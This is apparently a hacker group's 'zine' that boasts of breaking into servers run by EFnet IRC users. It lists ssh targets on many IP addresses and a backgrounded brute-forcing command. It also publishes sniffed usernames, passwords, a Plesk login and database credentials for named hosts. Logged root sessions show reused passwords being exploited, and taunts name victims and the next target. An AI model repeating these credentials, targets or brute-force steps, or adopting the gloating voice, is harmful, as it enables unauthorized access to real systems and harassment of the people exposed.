ssh oracle@82.114.101.66
ssh oracle@80.190.230.26
ssh oracle@80.249.110.130
ssh oracle@80.250.178.89
ssh oracle@80.251.163.21
ssh oracle@80.65.128.175
ssh oracle@209.84.255.105
ssh oracle@58.120.225.124
ssh oracle@63.209.12.251
ssh oracle@68.167.115.234
ssh oracle@58.120.225.124
ssh oracle@72.244.100.245
ssh oracle@58.120.225.124
ssh oracle@68.167.115.234
ssh oracle@63.120.68.100
ssh oracle@63.136.1.22
ssh oracle@91.103.96.18
ssh oracle@68.178.81.200
ssh oracle@82.110.102.235
ssh oracle@82.110.214.40
ssh oracle@82.102.93.4
ssh oracle@81.95.128.1
ssh oracle@81.95.128.11
ssh oracle@78.90.100.203
ssh oracle@80.249.110.130
ssh oracle@80.250.178.89
ssh oracle@80.251.163.21
ssh oracle@209.84.255.105
ssh oracle@63.123.44.22
ssh oracle@139.102.15.28
ssh oracle@128.175.13.183
ssh oracle@193.86.200.120
ssh oracle@78.90.100.203
ssh oracle@82.110.102.235
ssh oracle@82.94.199.146
ssh oracle@82.147.71.143
ssh oracle@129.173.66.56
ssh oracle@128.59.59.62
ssh oracle@72.83.128.115
ssh oracle@139.102.15.28
ssh oracle@128.59.59.62
ssh oracle@72.83.128.115
ssh oracle@128.175.13.183
ssh oracle@12.111.69.145
ssh oracle@128.175.13.183
ssh oracle@12.111.69.145
ssh oracle@72.244.100.245
ssh oracle@80.190.230.26
ssh oracle@139.102.15.28
ssh oracle@casaba.cc.columbia.edu
ssh oracle@128.59.59.62
ssh oracle@139.102.15.28
ssh oracle@139.102.15.33
ssh oracle@139.102.15.28
ssh root@213.239.174.129
ssh math402@master.queensu.ca
ssh math402@mast.queensu.ca
ssh root@74.221.128.106
ssh root@213.239.174.129
ssh math402@mast.queensu.ca
ssh oracle@129.173.66.56
ssh 213.239.174.129 -l root
ssh oracle@209.5.106.100
ssh oracle@209.84.255.104
ssh oracle@209.84.255.104
ssh oracle@209.84.255.105
ssh oracle@130.89.1.65
ssh oracle@130.192.112.103
ssh oracle@130.60.68.125
ssh oracle@194.204.32.101
ssh oracle@80.251.163.21
ssh oracle@80.250.178.89
ssh oracle@80.249.110.130
ssh oracle@80.190.230.26
ssh oracle@82.102.93.4
ssh oracle@80.65.128.175
ssh oracle@82.147.130.245
ssh oracle@80.65.128.175
ssh oracle@82.102.93.4
ssh oracle@80.190.230.26
ssh oracle@80.249.110.130

bash# nohup ./brute list >> /dev/null &

l0000000000lll




((((((((((((((( OKAY I WILL PASTE NOW SOME SNIFF LOGS ))))))))))))))))))))))


#COOL CORPORATION OF EFNET GOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOD

66.109.20.52/corp.efnet.net (stevoo:1qaz,2wsx) (venial:n1gg0rv3n) - FreeBSD corp.efnet.net 6.3-STABLE FreeBSD 6.3-STABLE #0: Fri Feb  8 21:24:16 UTC 2008     root@corp.efnet.net:/usr/obj/usr/src/sys/corp  i386 | cat /home/venial/psybnc/lang/french.lng

72.20.13.30/box.observers.net (venial:n1gg0rv3n) (coldfyre:qksq90a) - FreeBSD box.observers.net 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #7: Mon Oct 23 15:14:33 PDT 2006     root@box.observers.net:/usr/obj/usr/src/sys/obs  i386

85.24.148.29/evilbsd.com (venial:n1gg0rv3n) - FreeBSD epic.xzibition.com 5.4-RELEASE-p16 FreeBSD 5.4-RELEASE-p16 #1: Sat Jun 17 00:03:34 CEST 2006     root@epic.outlandz.net:/usr/obj/usr/src/sys/EPIC i386 i386 Intel(R) Pentium(R) 4 CPU 3.00GHz FreeBSD

72.20.48.65/echo.xzibition.com (venial:n1gg0rv3n) - FreeBSD echo.xzibition.com 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #1: Fri Nov  3 23:59:29 UTC 2006     root@echo.outlandz.net:/usr/obj/usr/src/sys/ECHO  i386

212.71.19.102/users.geekshells.org (venial:n1gg0rv3n) - FreeBSD spark.ofloo.net 6.3-RELEASE-p1 FreeBSD 6.3-RELEASE-p1 #11: Sun Feb 17 13:18:10 CET 2008     ofloo@spark.ofloo.net:/usr/obj/usr/src/sys/OFL  i386

& THKX VENIAL*********************









[root@x0x0x ~]# ssh accord.lyms.org -l smyl
smyl@accord.lyms.org's password: ^(x187

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ sudo su root
Password: xxxxxx

bash# uname -a
FreeBSD accord.lyms.org 6.2-RELEASE-p5 FreeBSD 6.2-RELEASE-p5 #0: Fri Jun 15 11:27:14 PDT 2007     root@accord.lyms.org:/usr/obj/usr/src/sys/FOO  i386
bash# exit






@#@#@###@#@ smyl you are really expert... making password of nsdfix.accesshost.us same as accord.lyms.org!! thks very much!!@#@@#@#@##@#@#



[root@x0x0x ~]# ssh nsdfix.accesshost.us -l smyl
smyl@nsdfix.accesshost.us's password: ^(x187

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ sudo su root
Password: xxxxxx

bash# uname -a
Linux nsdfix.accesshost.us 2.6.18-6-486 #1 Sun Feb 10 22:06:33 UTC 2008 i686 GNU/Linux
bash# exit






#@#@#@##@ OKAY... dont try change ur password!! i will hack again...



[root@x0x0x ~]# ssh 64.18.144.130 -l smyl
smyl@64.18.144.130 's password: ^(x187

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ sudo su root
Password: xxxxxx


// (dak- owned ?)


bash# cat /etc/passwd|grep dak|wc -l
1
bash# uname -a
FreeBSD rock.accessshells.us 6.1-RELEASE FreeBSD 6.1-RELEASE #0: Thu Oct 18 20:45:44 EDT 2007     root@rock.accessshells.us:/usr/obj/usr/src/sys/LSD  i386
bash# exit





;;;;;;;...........

   ___      ___             
  /   \____/   \   NO WOMAN 
 /    / __ \    \   NO BALLS
/    |  ..  |    \          
\___/|      |\___/\         
   | |_|  |_|      \        
   | |/|__|\|       \       
   |   |__|         |\      
   |   |__|   |_/  /  \     
   | @ |  | @ || @ |   '    
   |   |~~|   ||   | HF     
   'ooo'  'ooo''ooo'        



cat somesniff_log;

<Smoracle> the domain for dev: dredgemedia.org, un: dredgemediaorg pass: g3u5nonwrp
<Smoracle> plesk login: https://dredgemedia.org:8443
<Smoracle> db name: pu   username: dredge_pu_dev   pass: ip35jrt24



.......................(dont worry, be happy!) l0l







staring on x0x0x2;


          -----------
         ´           `
        ´         - monstershells
       ´         ´
      ´      phisher1
     ´          o 
    ´           |
   |           / \                    hub.us.quakenet.org         __ *webguidepartner.com
   |- efnet - /   \               ---´                     sonny ´                 
   ´         /     \             ´                    ----´
dukat+-------       -------+stevoo    efnet.port80.se´
         \   \union/   /         `---´
         /   /     \   \                                                 
venial+-----        -----+smyl/dak   some shells
   `-                            `---´
     `some shells



                              /       /
                           .'<_.-._.'<
                          /           \      .^.
        ._               |  -+- -+-    |    (_|_)
     r- |\                \   /       /      // 
   /\ \\  :                \  -=-    /       \\
    `. \\.'           ___.__`..;._.-'---...  //
      ``\\      __.--"        `;'     __   `-.  
        /\\.--""      __.,              ""-.  ".
        ;=r    __.---"   | `__    __'   / .'  .'
        '=/\\""           \             .'  .'
            \\             |  __ __    /   |
             \\            |  -- --   //`'`'
              \\           |  -- --  ' | //
               \\          |    .      |// r.s.t.

~> messages

    (*) stevoo            - Open your eyes is a good way to avoid punches! (see stevoo picture, to understand this, LOL)
    (*) phisher1          - You are easy! think this. learn more www.linux.org/lessons/.
    (*) smyl              - Teach about security lol http://apex.vtc.com/linux-security.php.
    (*) venial            - We like you, but don´t be kiddie.
    (*) dubkat            - You are 100% pwned, keed quiet.
    (*) ik                - Do not be shown. We wont make fun about you.
    (*) misery            - As you asked, your nick dont be here! Do not make to be :) !
    (*) dtr               - NEXT TARGET!
    (*) dmer [at] brlink  - Open your eyes.
    (*) ?                 - Don´t keep in us way.


*'no much patience to do this zine'*



^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^   ^^^^^^^
^^^^^^^ thkx to #soldiers @ efnet ^^^^^^^ 
^^^^^^^        g.  and      	  ^^^^^^^ 
^^^^^^^       all blackhats!  	  ^^^^^^^ 
^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^   ^^^^^^^


# x0x0x r. - s. - t.
#
# wanna send us a message? x0x0xcr3w [at] gmail [dot] com
#
# EOF